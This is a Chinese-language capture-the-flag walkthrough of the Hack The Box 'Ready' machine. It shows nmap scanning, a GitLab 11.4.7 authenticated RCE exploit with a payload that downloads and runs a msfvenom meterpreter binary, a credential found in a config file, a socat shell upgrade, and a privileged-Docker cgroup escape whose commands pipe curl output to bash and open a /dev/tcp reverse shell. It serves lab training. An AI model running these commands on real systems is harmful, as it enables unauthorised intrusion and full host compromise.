服務(wù)探測(cè)

開放端口

┌──(root?rock)-[~]
└─# nmap -p- --open 10.10.10.220              
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 04:24 EDT
Nmap scan report for 10.10.10.220
Host is up (0.030s latency).
Not shown: 61766 closed tcp ports (reset), 3767 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
5080/tcp open  onscreen

Nmap done: 1 IP address (1 host up) scanned in 50.09 seconds

詳細(xì)端口信息

┌──(root?rock)-[~]
└─# nmap -sV -Pn -A -O 10.10.10.220 -p 22,5080
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 04:26 EDT
Nmap scan report for 10.10.10.220
Host is up (0.092s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
|_http-title: GitLab is not responding (502)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 11 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   ... 10
11  12.36 ms 10.10.10.220

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.71 seconds

web

robots.txt

User-Agent: *
Disallow: /autocomplete/users
Disallow: /search
Disallow: /api
Disallow: /admin
Disallow: /profile
Disallow: /dashboard
Disallow: /projects/new
Disallow: /groups/new
Disallow: /groups/*/edit
Disallow: /users
Disallow: /help
# Only specifically allow the Sign In page to avoid very ugly search results
Allow: /users/sign_in

# Global snippets
User-Agent: *
Disallow: /s/
Disallow: /snippets/new
Disallow: /snippets/*/edit
Disallow: /snippets/*/raw

# Project details
User-Agent: *
Disallow: /*/*.git
Disallow: /*/*/fork/new
Disallow: /*/*/repository/archive*
Disallow: /*/*/activity
Disallow: /*/*/new
Disallow: /*/*/edit
Disallow: /*/*/raw
Disallow: /*/*/blame
Disallow: /*/*/commits/*/*
Disallow: /*/*/commit/*.patch
Disallow: /*/*/commit/*.diff
Disallow: /*/*/compare
Disallow: /*/*/branches/new
Disallow: /*/*/tags/new
Disallow: /*/*/network
Disallow: /*/*/graphs
Disallow: /*/*/milestones/new
Disallow: /*/*/milestones/*/edit
Disallow: /*/*/issues/new
Disallow: /*/*/issues/*/edit
Disallow: /*/*/merge_requests/new
Disallow: /*/*/merge_requests/*.patch
Disallow: /*/*/merge_requests/*.diff
Disallow: /*/*/merge_requests/*/edit
Disallow: /*/*/merge_requests/*/diffs
Disallow: /*/*/project_members/import
Disallow: /*/*/labels/new
Disallow: /*/*/labels/*/edit
Disallow: /*/*/wikis/*/edit
Disallow: /*/*/snippets/new
Disallow: /*/*/snippets/*/edit
Disallow: /*/*/snippets/*/raw
Disallow: /*/*/deploy_keys
Disallow: /*/*/hooks
Disallow: /*/*/services
Disallow: /*/*/protected_branches
Disallow: /*/*/uploads/

在這個(gè)頁面確認(rèn)gitlab版本為：11.4.7

http://10.10.10.220:5080/help

搜索漏洞情況旗国，存在一個(gè)授權(quán)的RCE

┌──(root??kali)-[~/htb/Ready]
└─# searchsploit gitlab 11.4.7
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
GitLab 11.4.7 - RCE (Authenticated) (2)                                                                                                                                                                   | ruby/webapps/49334.py
GitLab 11.4.7 - Remote Code Execution (Authenticated) (1)                                                                                                                                                 | ruby/webapps/49257.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

執(zhí)行payload，但是沒有返回rev shell

──(root??kali)-[~/htb/Ready]
└─# python3 49334.py -u chen -p 123456789 -g 'http://10.10.10.220' -l 10.10.16.2 -P 5080
[+] authenticity_token: P6oayybySIHkjN1hOiORE2To2qUsij2zCCWcEwRjr/eJ/UnDoWxn4YF5ZWw9aRBAUenpEHf0nkcnXQAZfSnCew==
[+] Creating project with random name: project2006
[+] Running Exploit
[+] Exploit completed successfully!

查看exp源代碼勒庄，發(fā)現(xiàn)用的是nc反彈的shell

f'nc {local_ip} {local_port} -e /bin/bash'

linux為了安全考慮，一般會(huì)禁用nc的-e和-c參數(shù)

我們首先要證明確實(shí)是存在RCE瘫里，然后再想其他辦法反彈shell回來

我們把上面那行代碼改為：

 f'wget http://10.10.16.2/any'

在kali本地開一個(gè)http服務(wù)器实蔽，然后執(zhí)行exp，收到get請(qǐng)求谨读，證明rce存在

┌──(root??kali)-[~/htb/Ready]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.220 - - [01/Jul/2022 05:22:07] code 404, message File not found
10.10.10.220 - - [01/Jul/2022 05:22:07] "GET /any HTTP/1.1" 404 -

foothold

編譯一個(gè)exp

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.16.2 LPORT=4242 -f elf > shell.elf

起一個(gè)http服務(wù)

┌──(root??kali)-[~/htb/Ready]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

上面49334.py的payload改為

wget http://10.10.16.2/shell.elf -O /tmp/shell.elf&&chmod 777 /tmp/shell.elf&&/tmp/shell.elf

如果上面payload執(zhí)行不了嘗試分三次執(zhí)行

觸發(fā)攻擊

┌──(root??kali)-[~/htb/Ready]
└─# python3 49334.py -u chen -p 123456789 -g 'http://10.10.10.220' -l 10.10.16.2 -P 5080
[+] authenticity_token: 8IMetc2Ptcb5HXlnRVYTK3YdOhCdLQ39XTrwO2FOjxHBAF+SJbzuwNYB9udD2jQnC1Tlg5oNRNczOisNZa3Aog==
[+] Creating project with random name: project4047
[+] Running Exploit
[+] Exploit completed successfully!

拿到user.txt

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.2:4242 
[*] Sending stage (989032 bytes) to 10.10.10.220
[*] Meterpreter session 4 opened (10.10.16.2:4242 -> 10.10.10.220:42282) at 2022-07-18 02:55:05 -0400

meterpreter > cd /home
meterpreter > ls
Listing: /home
==============

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
040755/rwxr-xr-x  4096  dir   2022-04-05 08:32:28 -0400  dude

meterpreter > cd dude
meterpreter > ls
Listing: /home/dude
===================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100551/r-xr-x--x  33    fil   2022-07-18 02:21:48 -0400  user.txt

meterpreter > cat user.txt 
176f5155e3df....

提權(quán)

使用/bin/bash -i提升到tty

在/opt目錄找到一個(gè)backup文件夾局装，/opt目錄通常不會(huì)有任何文件，因此這里的文件信息要多注意劳殖，常常是提權(quán)的關(guān)鍵

在gitlab.rb里找到一個(gè)密碼

git@gitlab:/opt/backup$ cat gitlab.rb|grep pass
cat gitlab.rb|grep pass
#### Email account password
# gitlab_rails['incoming_email_password'] = "[REDACTED]"
#     password: '_the_password_of_the_bind_user'
#     password: '_the_password_of_the_bind_user'
#   '/users/password',
#### Change the initial default admin password and shared runner registration tokens.
# gitlab_rails['initial_root_password'] = "password"
# gitlab_rails['db_password'] = nil
# gitlab_rails['redis_password'] = nil
gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"
# gitlab_shell['http_settings'] = { user: 'username', password: 'password', ca_file: '/etc/ssl/cert.pem', ca_path: '/etc/pki/tls/certs', self_signed_cert: false}
##! `SQL_USER_PASSWORD_HASH` can be generated using the command `gitlab-ctl pg-password-md5 gitlab`
# postgresql['sql_user_password'] = 'SQL_USER_PASSWORD_HASH'
# postgresql['sql_replication_password'] = "md5 hash of postgresql password" # You can generate with `gitlab-ctl pg-password-md5 <dbuser>`
# redis['password'] = 'redis-password-goes-here'
####! **Master password should have the same value defined in
####!   redis['password'] to enable the instance to transition to/from
# redis['master_password'] = 'redis-password-goes-here'
# geo_secondary['db_password'] = nil
# geo_postgresql['pgbouncer_user_password'] = nil
#     password: PASSWORD
###! generate this with `echo -n '$password + $username' | md5sum`
# pgbouncer['auth_query'] = 'SELECT username, password FROM public.pg_shadow_lookup($1)'
#     password: MD5_PASSWORD_HASH
# postgresql['pgbouncer_user_password'] = nil

留意這一行

gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"

嘗試提權(quán)贼邓，提示只能在terminal下執(zhí)行su命令

git@gitlab:/tmp$ su root
su root
su: must be run from a terminal
git@gitlab:/tmp$ 

我們需要提升一個(gè)完整的終端

提升完整shell

(這里其實(shí)是我打OSCPlab學(xué)到的方法。闷尿。)

參考這里的方法

靶機(jī)如果沒有socat塑径，到這里下載二進(jìn)制文件：https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat

kali:

socat file:`tty`,raw,echo=0 tcp-listen:443

靶機(jī)

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.119.187:443

現(xiàn)在我們收到一個(gè)完整的shell，可以執(zhí)行su命令

┌──(root??kali)-[~/htb/Ready]
└─# socat file:`tty`,raw,echo=0 tcp-listen:443
git@gitlab:/tmp$ su
Password: 
root@gitlab:/tmp# whoami
root
root@gitlab:~# id
uid=0(root) gid=0(root) groups=0(root)
root@gitlab:~# 

但是沒有發(fā)現(xiàn)root.txt填具，因?yàn)槲覀冊(cè)谝粋€(gè)容器內(nèi)

docker逃逸

查看docker-compose.yml,這個(gè)是docker的配置文件

root@gitlab:/opt/backup# cat docker-compose.yml
version: '2.4'

services:
  web:
    image: 'gitlab/gitlab-ce:11.4.7-ce.0'
    restart: always
    hostname: 'gitlab.example.com'
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url 'http://172.19.0.2'
        redis['bind']='127.0.0.1'
        redis['port']=6379
        gitlab_rails['initial_root_password']=File.read('/root_pass')
    networks:
      gitlab:
        ipv4_address: 172.19.0.2
    ports:
      - '5080:80'
      #- '127.0.0.1:5080:80'
      #- '127.0.0.1:50443:443'
      #- '127.0.0.1:5022:22'
    volumes:
      - './srv/gitlab/config:/etc/gitlab'
      - './srv/gitlab/logs:/var/log/gitlab'
      - './srv/gitlab/data:/var/opt/gitlab'
      - './root_pass:/root_pass'
      - '/opt/user:/home/dude/'
    privileged: true
    restart: unless-stopped
    #mem_limit: 1024m

networks:
  gitlab:
    driver: bridge
    ipam:
      config:
        - subnet: 172.19.0.0/16

privileged: true表示容器在主機(jī)上也有root權(quán)限

參考這篇文章里的方法统舀，我們可以實(shí)現(xiàn)docker逃逸，獲取主機(jī)的一個(gè)root shell

root@gitlab:~# d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
root@gitlab:~# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@gitlab:~# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@gitlab:~# echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.16.2/shell.sh | bash' >/c;
root@gitlab:~# chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";

shell.sh

bash >& /dev/tcp/10.10.16.2/4242 0>&1

收到反彈shell

┌──(root??kali)-[~]
└─# nc -lnvp 4242                                                                                               1 ?
listening on [any] 4242 ...
connect to [10.10.16.2] from (UNKNOWN) [10.10.10.220] 46706
id
uid=0(root) gid=0(root) groups=0(root)
whoami  
root
ls /root
docker-gitlab
ready-channel
root.txt
snap
cat root.txt
ffa185f28f07941...